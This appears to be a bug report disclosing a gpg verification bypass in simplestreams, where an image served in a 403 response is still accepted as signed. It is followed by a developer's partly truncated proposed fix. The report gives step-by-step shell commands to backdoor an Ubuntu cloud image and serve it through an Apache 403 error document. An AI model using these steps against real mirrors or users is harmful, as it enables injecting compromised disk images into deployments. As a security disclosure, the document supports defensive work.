If the image file returned by an HTTP simplestreams mirror is returned in the body of a 403 response instead of a standard 200 response, then simplestreams fails to verify the gpg signature yet still returns the image to the caller to be treated as verified. A malicious mirror operator can exploit this behaviour to inject arbitrary disk images to a client posing as signed simplestream images (such as Ubuntu cloud images). If the client isn't using HTTPS (reasonable since simplestreams is supposed to be end-to-end authenticated with gpg) then a man-in-the-middle attack can also achieve malicious image injection in the same way.
My example case does this to a uvtool user; bug 1485785 suggests to me that the same mechanism can used to compromise images registered in Glance in a production OpenStack deployment.
Steps to reproduce:
1. Start with a fresh Trusty install (I used LXC).
2. sudo apt-get update && sudo apt-get -y install uvtool simplestreams ubuntu-cloudimage-keyring apache2
3. Mirror an image from the upstream Ubuntu cloud image source: sudo sstream-mirror --keyring /usr/share/keyrings/ubuntu-cloudimage-keyring.gpg --max 1 http://cloud-images.ubuntu.com/releases /var/www/html/releases release=trusty arch=amd64 ftype=disk1.img
4. Now copy the mirrored image found in /var/www/html/releases/server/releases/trusty/ to /var/www/html/backdoored.img and maliciously modify it as you wish. mount-image-callback is a useful tool to do this, but cannot run inside LXC. For example, inside the container I did: "sudo cp /var/www/html/{releases/server/releases/trusty/release-20150814/ubuntu-14.04-server-cloudimg-amd64-disk1.img,backdoored.img}" and then, from the host: "sudo mount-image-callback /var/lib/lxc/test2/tmpfs/delta0/var/www/html/backdoored.img chroot _MOUNTPOINT_ passwd root"
5. Force the authentic image URL to 403: sudo chmod 0 /var/www/html/releases/server/releases/trusty/*/*
6. Arrange for the 403 error document to contain the malicious image: sudo sed -i '/DocumentRoot/a\ ErrorDocument 403 /backdoored.img' /etc/apache2/sites-available/000-default.conf
7. Restart Apache: sudo service apache2 restart
8. Work around gpg/simplestreams sudo file ownership issue (DO NOT DO THIS ON YOUR OWN MACHINE!): sudo rm -rf ~/.gnupg
9. Make sure you belong to the libvirtd group for uvtool libvirt access: newgrp libvirtd
10. Sync from local mirror: uvt-simplestreams-libvirt sync --source http://localhost/releases/ arch=amd64 release=trusty
Expected behaviour: gpg authentication failure, file not mirrored
Actual behaviour: malicious image mirrored. Verify by examining the contents of /var/lib/uvtool/libvirt/images/ using mount-image-callback (in my example, you'll see the password I set in /etc/shadow), or if on bare metal, just firing up a VM with uvt-kvm should demonstrate (I've not verified it this way).
Credit is due to bug 1485456 and 1485785 which made me suspicious enough to do some further investigation.
This is my current proposed fix.
Basically what we do is create a 'ChecksummingCo
That contentsource will raise exception if expected size amount of bytes are read and size is available.
We log warning if no checksums are available in the source information.
If there is no 'size' available, currently that would require the consumer of this to invoke 'check'
Its non-trivial to automatically do that, as we can't just do it in 'close()' as close could be done for any reason and the caller would not generally expect a exeption to be raised.
comments?